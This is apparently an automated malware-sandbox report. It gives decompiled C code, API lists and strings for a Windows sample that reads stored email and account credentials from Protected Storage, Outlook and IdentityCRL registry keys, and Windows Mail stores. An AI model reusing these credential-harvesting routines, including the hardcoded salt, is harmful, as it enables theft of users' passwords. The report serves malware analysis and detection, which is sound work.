                                                                                                                                                    0x00403cc6
                                                                                                                                                    0x00403cd0
                                                                                                                                                    0x00403cdb
                                                                                                                                                    0x00403cdc
                                                                                                                                                    0x00403ce8
                                                                                                                                                    0x00403cf4
                                                                                                                                                    0x00403d07
                                                                                                                                                    0x00403d0f
                                                                                                                                                    0x00403d11
                                                                                                                                                    0x00403d19
                                                                                                                                                    0x00403d19
                                                                                                                                                    0x00403d2c
                                                                                                                                                    0x00403d34
                                                                                                                                                    0x00403d36
                                                                                                                                                    0x00403d3e
                                                                                                                                                    0x00403d3e
                                                                                                                                                    0x00403d44
                                                                                                                                                    0x00403d49
                                                                                                                                                    0x00403d53
                                                                                                                                                    0x00403d5f
                                                                                                                                                    0x00403d60
                                                                                                                                                    0x00403d69
                                                                                                                                                    0x00403d62
                                                                                                                                                    0x00403d62
                                                                                                                                                    0x00403d62
                                                                                                                                                    0x00403d6e
                                                                                                                                                    0x00403d73
                                                                                                                                                    0x00403d7b
                                                                                                                                                    0x00403d7d
                                                                                                                                                    0x00403d8a
                                                                                                                                                    0x00403d7f
                                                                                                                                                    0x00403d83
                                                                                                                                                    0x00403d83
                                                                                                                                                    0x00403d9f
                                                                                                                                                    0x00403da9
                                                                                                                                                    0x00403db1
                                                                                                                                                    0x00403db3
                                                                                                                                                    0x00403dc0
                                                                                                                                                    0x00403db5
                                                                                                                                                    0x00403db9
                                                                                                                                                    0x00403db9
                                                                                                                                                    0x00403dc9
                                                                                                                                                    0x00403dd4
                                                                                                                                                    0x00403de0
                                                                                                                                                    0x00403dec
                                                                                                                                                    0x00403df2
                                                                                                                                                    0x00403df8
                                                                                                                                                    0x00403dfe
                                                                                                                                                    0x00403e04
                                                                                                                                                    0x00403e09
                                                                                                                                                    0x00403e0f
                                                                                                                                                    0x00403e12
                                                                                                                                                    0x00403e1d
                                                                                                                                                    0x00403e27
                                                                                                                                                    0x00403e27
                                                                                                                                                    0x00403e2c
                                                                                                                                                    0x00403e32
                                                                                                                                                    0x00403e35
                                                                                                                                                    0x00403e45
                                                                                                                                                    0x00403e55
                                                                                                                                                    0x00403e5f
                                                                                                                                                    0x00403e5f
                                                                                                                                                    0x00403e6a
                                                                                                                                                    0x00403e6b
                                                                                                                                                    0x00403e71
                                                                                                                                                    0x00403e7d
                                                                                                                                                    0x00403e86

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040E894: FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                                                                                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C5C
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C71
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 00403E45
                                                                                                                                                    Strings
                                                                                                                                                    • PStoreCreateInstance, xrefs: 00403C6B
                                                                                                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403CB7
                                                                                                                                                    • pstorec.dll, xrefs: 00403C57
                                                                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403D22
                                                                                                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CCB
                                                                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D69
                                                                                                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403CC1
                                                                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CFD
                                                                                                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D62
                                                                                                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403CAD
                                                                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D95
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProcstrcpy
                                                                                                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                    • API String ID: 2884822230-961845771
                                                                                                                                                    • Opcode ID: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                                                                                                    • Instruction ID: d05da07ce2d894a49ef5f331cfc6c83e82fbb8602fa7f27bb7646818df223e42
                                                                                                                                                    • Opcode Fuzzy Hash: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                                                                                                    • Instruction Fuzzy Hash: 9B51D771600605B6D714BF72CD46BEABB6CAF00709F10053FF905B61C2DBBCAA5587A9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D9F9 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 224 40d9f9-40da2e call 4118a0 RegOpenKeyExA 227 40db30-40db36 224->227 228 40da34-40da48 RegOpenKeyExA 224->228 229 40db26-40db2a RegCloseKey 228->229 230 40da4e-40da77 RegQueryValueExA 228->230 229->227 231 40db1c-40db20 RegCloseKey 230->231 232 40da7d-40da8c call 4047a0 230->232 231->229 232->231 235 40da92-40daca call 404811 232->235 235->231 238 40dacc-40dad4 235->238 239 40db12-40db16 LocalFree 238->239 240 40dad6-40db0d memcpy * 2 call 40d6fb 238->240 239->231 240->239
                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E0040D9F9(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
				void* _v0;
				void* __esi;
				long _t34;
				long _t36;
				long _t40;
				void* _t64;
				void* _t68;
				int _t73;

				E004118A0(0x102c, _t64);
				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
				if(_t34 != 0) {
					L10:
					return _t34;
				}
				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
				if(_t36 != 0) {
					L9:
					_t34 = RegCloseKey(_v0); // executed
					goto L10;
				}
				_a8 = 0x1000;
				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
				_t81 = _t40;
				if(_t40 == 0) {
					_t63 = _a4 + 0xc;
					if(E004047A0(_a4 + 0xc, _t81) != 0) {
						_a20 = _a8;
						_a24 =  &_a40;
						_t73 = 0x40;
						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
						_a28 = _t73;
						_a32 = _t68;
						if(E00404811(_t63,  &_a20,  &_a28,  &_a12) != 0) {
							if(_a12 < 0x400) {
								memcpy( &_a40, _t68, _t73);
								memcpy( &_a104, _a16, _a12);
								E0040D6FB(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
							}
							LocalFree(_a16);
						}
					}
				}
				RegCloseKey(_a4);
				goto L9;
			}











                                                                                                                                                    0x0040da04
                                                                                                                                                    0x0040da2a
                                                                                                                                                    0x0040da2e
                                                                                                                                                    0x0040db30
                                                                                                                                                    0x0040db36
                                                                                                                                                    0x0040db36
                                                                                                                                                    0x0040da44
                                                                                                                                                    0x0040da48
                                                                                                                                                    0x0040db26
                                                                                                                                                    0x0040db2a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040db2a
                                                                                                                                                    0x0040da67
                                                                                                                                                    0x0040da6f
                                                                                                                                                    0x0040da75
                                                                                                                                                    0x0040da77
                                                                                                                                                    0x0040da80
                                                                                                                                                    0x0040da8c
                                                                                                                                                    0x0040da96
                                                                                                                                                    0x0040daa0
                                                                                                                                                    0x0040daa4
                                                                                                                                                    0x0040dab4
                                                                                                                                                    0x0040dabb
                                                                                                                                                    0x0040dabf
                                                                                                                                                    0x0040daca
                                                                                                                                                    0x0040dad4
                                                                                                                                                    0x0040dadd
                                                                                                                                                    0x0040daf2
                                                                                                                                                    0x0040db0d
                                                                                                                                                    0x0040db0d
                                                                                                                                                    0x0040db16
                                                                                                                                                    0x0040db16
                                                                                                                                                    0x0040daca
                                                                                                                                                    0x0040da8c
                                                                                                                                                    0x0040db20
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA2A
                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA44
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E70,?), ref: 0040DA6F
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB20
                                                                                                                                                      • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                                                                      • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                                                                    • memcpy.MSVCRT ref: 0040DADD
                                                                                                                                                    • memcpy.MSVCRT ref: 0040DAF2
                                                                                                                                                      • Part of subcall function 0040D6FB: RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                                                                                                      • Part of subcall function 0040D6FB: memset.MSVCRT ref: 0040D743
                                                                                                                                                      • Part of subcall function 0040D6FB: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                                                                                                      • Part of subcall function 0040D6FB: RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                                                                                                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E70,?), ref: 0040DB16
                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E70,?), ref: 0040DB2A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                    • API String ID: 2768085393-1693574875
                                                                                                                                                    • Opcode ID: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                                                                                                    • Instruction ID: 6117dd664a6da5d1700893ef21bfd696e4846e6baba0a559227c27352822965f
                                                                                                                                                    • Opcode Fuzzy Hash: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                                                                                                    • Instruction Fuzzy Hash: 95316D72504344AFD700DF55DC40D9BBBECEB88358F40493EFA84E2160E774DA188B6A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411654 Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 242 411654-411670 call 411840 GetModuleHandleA 245 411691-411694 242->245 246 411672-41167d 242->246 248 4116bd-41170a __set_app_type __p__fmode __p__commode call 401a4d 245->248 246->245 247 41167f-411688 246->247 249 4116a9-4116ad 247->249 250 41168a-41168f 247->250 257 411718-411772 call 41182c _initterm __getmainargs _initterm 248->257 258 41170c-411717 __setusermatherr 248->258 249->245 253 4116af-4116b1 249->253 250->245 252 411696-41169d 250->252 252->245 255 41169f-4116a7 252->255 256 4116b7-4116ba 253->256 255->256 256->248 261 411774-41177c 257->261 262 4117ae-4117b1 257->262 258->257 263 411782-411785 261->263 264 41177e-411780 261->264 265 4117b3-4117b7 262->265 266 41178b-41178f 262->266 263->266 267 411787-411788 263->267 264->261 264->263 265->262 268 411791-411793 266->268 269 411795-4117a6 GetStartupInfoA 266->269 267->266 268->267 268->269 270 4117b9-4117bb 269->270 271 4117a8-4117ac 269->271 272 4117bc-4117d0 GetModuleHandleA call 40b9ad 270->272 271->272 275 4117d2-4117d3 exit 272->275 276 4117d9-411819 _cexit call 411879 272->276 275->276
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t39;
				void _t41;
				intOrPtr _t48;
				signed int _t50;
				int _t52;
				intOrPtr _t55;
				signed int _t56;
				signed int _t57;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr* _t65;
				intOrPtr* _t69;
				int _t70;
				void* _t71;
				intOrPtr _t79;

				_push(0x70);
				_push(0x4123e0);
				E00411840(__ebx, __edi, __esi);
				_t33 = GetModuleHandleA(0);
				if(_t33->i != 0x5a4d) {
					L4:
					 *(_t71 - 0x1c) = 0;
				} else {
					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
					if( *_t65 != 0x4550) {
						goto L4;
					} else {
						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
						if(_t56 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
								goto L4;
							} else {
								_t57 = 0;
								__eflags =  *(_t65 + 0xe8);
								goto L9;
							}
						} else {
							if(_t56 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
									goto L4;
								} else {
									_t57 = 0;
									__eflags =  *(_t65 + 0xf8);
									L9:
									_t9 = __eflags != 0;
									__eflags = _t9;
									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t71 - 4) = 0;
				__set_app_type(2);
				 *0x417b6c =  *0x417b6c | 0xffffffff;
				 *0x417b70 =  *0x417b70 | 0xffffffff;
				_t35 = __p__fmode();
				_t62 =  *0x416b8c; // 0x0
				 *_t35 = _t62;
				_t36 = __p__commode();
				_t63 =  *0x416b88; // 0x0
				 *_t36 = _t63;
				 *0x417b68 =  *_adjust_fdiv;
				_t39 = E00401A4D();
				_t79 =  *0x416000; // 0x1
				if(_t79 == 0) {
					__setusermatherr(E00401A4D);
					_pop(_t63);
				}
				E0041182C(_t39);
				_push(0x4123b0);
				_push(0x4123ac);
				L00411826();
				_t41 =  *0x416b84; // 0x0
				 *(_t71 - 0x20) = _t41;
				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x416b80, _t71 - 0x20);
				_push(0x4123a8);
				_push(0x412394); // executed
				L00411826(); // executed
				_t69 =  *_acmdln;
				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
				if( *_t69 != 0x22) {
					while(1) {
						__eflags =  *_t69 - 0x20;
						if(__eflags <= 0) {
							goto L17;
						}
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				} else {
					do {
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
						_t55 =  *_t69;
					} while (_t55 != 0 && _t55 != 0x22);
					if( *_t69 == 0x22) {
						L16:
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				}
				L17:
				_t48 =  *_t69;
				if(_t48 != 0 && _t48 <= 0x20) {
					goto L16;
				}
				 *(_t71 - 0x4c) = 0;
				GetStartupInfoA(_t71 - 0x78);
				_t87 =  *(_t71 - 0x4c) & 0x00000001;
				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
					_t50 = 0xa;
				} else {
					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
				}
				_t52 = E0040B9AD(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
				_t70 = _t52;
				 *(_t71 - 0x7c) = _t70;
				if( *(_t71 - 0x1c) == 0) {
					exit(_t70); // executed
				}
				__imp___cexit();
				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
				return E00411879(_t70);
			}





















                                                                                                                                                    0x00411654
                                                                                                                                                    0x00411656
                                                                                                                                                    0x0041165b
                                                                                                                                                    0x00411669
                                                                                                                                                    0x00411670
                                                                                                                                                    0x00411691
                                                                                                                                                    0x00411691
                                                                                                                                                    0x00411672
                                                                                                                                                    0x00411675
                                                                                                                                                    0x0041167d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041167f
                                                                                                                                                    0x0041167f
                                                                                                                                                    0x00411688
                                                                                                                                                    0x004116a9
                                                                                                                                                    0x004116ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004116af
                                                                                                                                                    0x004116af
                                                                                                                                                    0x004116b1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004116b1
                                                                                                                                                    0x0041168a
                                                                                                                                                    0x0041168f
                                                                                                                                                    0x00411696
                                                                                                                                                    0x0041169d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041169f
                                                                                                                                                    0x0041169f
                                                                                                                                                    0x004116a1
                                                                                                                                                    0x004116b7
                                                                                                                                                    0x004116b7
                                                                                                                                                    0x004116b7
                                                                                                                                                    0x004116ba
                                                                                                                                                    0x004116ba
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041168f
                                                                                                                                                    0x00411688
                                                                                                                                                    0x0041167d
                                                                                                                                                    0x004116bd
                                                                                                                                                    0x004116c2
                                                                                                                                                    0x004116c9
                                                                                                                                                    0x004116d0
                                                                                                                                                    0x004116d7
                                                                                                                                                    0x004116dd
                                                                                                                                                    0x004116e3
                                                                                                                                                    0x004116e5
                                                                                                                                                    0x004116eb
                                                                                                                                                    0x004116f1
                                                                                                                                                    0x004116fa
                                                                                                                                                    0x004116ff
                                                                                                                                                    0x00411704
                                                                                                                                                    0x0041170a
                                                                                                                                                    0x00411711
                                                                                                                                                    0x00411717
                                                                                                                                                    0x00411717
                                                                                                                                                    0x00411718
                                                                                                                                                    0x0041171d
                                                                                                                                                    0x00411722
                                                                                                                                                    0x00411727
                                                                                                                                                    0x0041172c
                                                                                                                                                    0x00411731
                                                                                                                                                    0x00411750
                                                                                                                                                    0x00411753
                                                                                                                                                    0x00411758
                                                                                                                                                    0x0041175d
                                                                                                                                                    0x0041176a
                                                                                                                                                    0x0041176c
                                                                                                                                                    0x00411772
                                                                                                                                                    0x004117ae
                                                                                                                                                    0x004117ae
                                                                                                                                                    0x004117b1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004117b3
                                                                                                                                                    0x004117b4
                                                                                                                                                    0x004117b4
                                                                                                                                                    0x00411774
                                                                                                                                                    0x00411774
                                                                                                                                                    0x00411774
                                                                                                                                                    0x00411775
                                                                                                                                                    0x00411778
                                                                                                                                                    0x0041177a
                                                                                                                                                    0x00411785
                                                                                                                                                    0x00411787
                                                                                                                                                    0x00411787
                                                                                                                                                    0x00411788
                                                                                                                                                    0x00411788
                                                                                                                                                    0x00411785
                                                                                                                                                    0x0041178b
                                                                                                                                                    0x0041178b
                                                                                                                                                    0x0041178f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00411795
                                                                                                                                                    0x0041179c
                                                                                                                                                    0x004117a2
                                                                                                                                                    0x004117a6
                                                                                                                                                    0x004117bb
                                                                                                                                                    0x004117a8
                                                                                                                                                    0x004117a8
                                                                                                                                                    0x004117a8
                                                                                                                                                    0x004117c3
                                                                                                                                                    0x004117c8
                                                                                                                                                    0x004117ca
                                                                                                                                                    0x004117d0
                                                                                                                                                    0x004117d3
                                                                                                                                                    0x004117d3
                                                                                                                                                    0x004117d9
                                                                                                                                                    0x0041180e
                                                                                                                                                    0x00411819

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3662548030-0
                                                                                                                                                    • Opcode ID: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                                                                                                    • Instruction ID: d7daaed26df3896bd014a213398510a4c94beeaf1e1b2d32e797684dc565bfa8
                                                                                                                                                    • Opcode Fuzzy Hash: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                                                                                                    • Instruction Fuzzy Hash: 60416DB0D40218DFCB209FA4D984AED7BB4AB08314F24857BE661D72A1D77D99C2CB5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410D1B Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                    			E00410D1B(void* __eflags, intOrPtr _a4) {
				void _v275;
				char _v276;
				char _v532;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void* __edi;
				void* __esi;
				int _t44;
				char* _t46;
				char* _t48;
				void* _t64;
				intOrPtr _t65;
				void* _t66;
				signed int _t68;
				void* _t74;
				void* _t75;

				_t75 = __eflags;
				_v796 = 0;
				memset( &_v795, 0, 0x104);
				_t64 = 0x1c;
				_t61 =  &_v796;
				 *((intOrPtr*)(_a4 + 4)) = 1;
				E0040EE59( &_v796, _t64); // executed
				E00406734( &_v796, "\\Microsoft\\Windows Mail");
				_t65 = _a4;
				E00410C43(_t65, _t75, _t61); // executed
				 *((intOrPtr*)(_t65 + 4)) = 2;
				_t66 = 0x1c;
				E0040EE59(_t61, _t66);
				E00406734(_t61, "\\Microsoft\\Windows Live Mail");
				E00410C43(_a4, _t75, _t61); // executed
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_v540 = 0;
				memset( &_v539, 0, 0x104);
				E0040EBC1(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104);
				_t44 = strlen( &_v540);
				if(_t44 > 0) {
					_t48 = _t74 + _t44 + 0x117;
					if( *_t48 == 0x5c) {
						 *_t48 = 0;
					}
				}
				_push( &_v532);
				_t46 =  &_v796;
				_push(_t46);
				L004115B2();
				_t78 = _t46;
				if(_t46 != 0) {
					_t46 = E00410C43(_a4, _t78,  &_v532); // executed
				}
				return _t46;
			}





















                                                                                                                                                    0x00410d1b
                                                                                                                                                    0x00410d37
                                                                                                                                                    0x00410d3c
                                                                                                                                                    0x00410d49
                                                                                                                                                    0x00410d4a
                                                                                                                                                    0x00410d4e
                                                                                                                                                    0x00410d55
                                                                                                                                                    0x00410d5f
                                                                                                                                                    0x00410d64
                                                                                                                                                    0x00410d6d
                                                                                                                                                    0x00410d72
                                                                                                                                                    0x00410d7b
                                                                                                                                                    0x00410d7c
                                                                                                                                                    0x00410d86
                                                                                                                                                    0x00410d92
                                                                                                                                                    0x00410da2
                                                                                                                                                    0x00410daa
                                                                                                                                                    0x00410dbd
                                                                                                                                                    0x00410dc5
                                                                                                                                                    0x00410de5
                                                                                                                                                    0x00410dea
                                                                                                                                                    0x00410dfe
                                                                                                                                                    0x00410e0c
                                                                                                                                                    0x00410e14
                                                                                                                                                    0x00410e16
                                                                                                                                                    0x00410e20
                                                                                                                                                    0x00410e22
                                                                                                                                                    0x00410e22
                                                                                                                                                    0x00410e20
                                                                                                                                                    0x00410e2c
                                                                                                                                                    0x00410e2d
                                                                                                                                                    0x00410e31
                                                                                                                                                    0x00410e32
                                                                                                                                                    0x00410e37
                                                                                                                                                    0x00410e3b
                                                                                                                                                    0x00410e48
                                                                                                                                                    0x00410e48
                                                                                                                                                    0x00410e53

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00410D3C
                                                                                                                                                      • Part of subcall function 00406734: strlen.MSVCRT ref: 00406736
                                                                                                                                                      • Part of subcall function 00406734: strlen.MSVCRT ref: 00406741
                                                                                                                                                      • Part of subcall function 00406734: strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                                                                                                      • Part of subcall function 0040EE59: memset.MSVCRT ref: 0040EEAE
                                                                                                                                                      • Part of subcall function 0040EE59: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                                                                                                      • Part of subcall function 0040EE59: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                                                                                                    • memset.MSVCRT ref: 00410DAA
                                                                                                                                                    • memset.MSVCRT ref: 00410DC5
                                                                                                                                                      • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 00410DFE
                                                                                                                                                    • strlen.MSVCRT ref: 00410E0C
                                                                                                                                                    • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 00410E32
                                                                                                                                                    Strings
                                                                                                                                                    • \Microsoft\Windows Live Mail, xrefs: 00410D81
                                                                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 00410DDB
                                                                                                                                                    • \Microsoft\Windows Mail, xrefs: 00410D5A
                                                                                                                                                    • Store Root, xrefs: 00410DD6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
                                                                                                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                    • API String ID: 4071991895-2578778931
                                                                                                                                                    • Opcode ID: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                                                                                                    • Instruction ID: 656a87abbde68b626b6b67706479efffa51c3f1aad4b8967eb2d69b922da332e
                                                                                                                                                    • Opcode Fuzzy Hash: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                                                                                                    • Instruction Fuzzy Hash: 3D318DB2548348ABD324E799DC46FCB77DC9BC4318F04482FF649D7182E678D68487AA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004037B1 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 301 4037b1-403803 memset * 2 call 410f79 304 4038c9-4038cc 301->304 305 403809-403869 call 4021d8 call 4060d0 * 2 strchr 301->305 312 40386b-40387c strcpy 305->312 313 40387e-403889 strlen 305->313 314 4038a6-4038c4 strcpy call 402407 312->314 313->314 315 40388b-4038a3 sprintf 313->315 314->304 315->314
                                                                                                                                                    C-Code - Quality: 76%
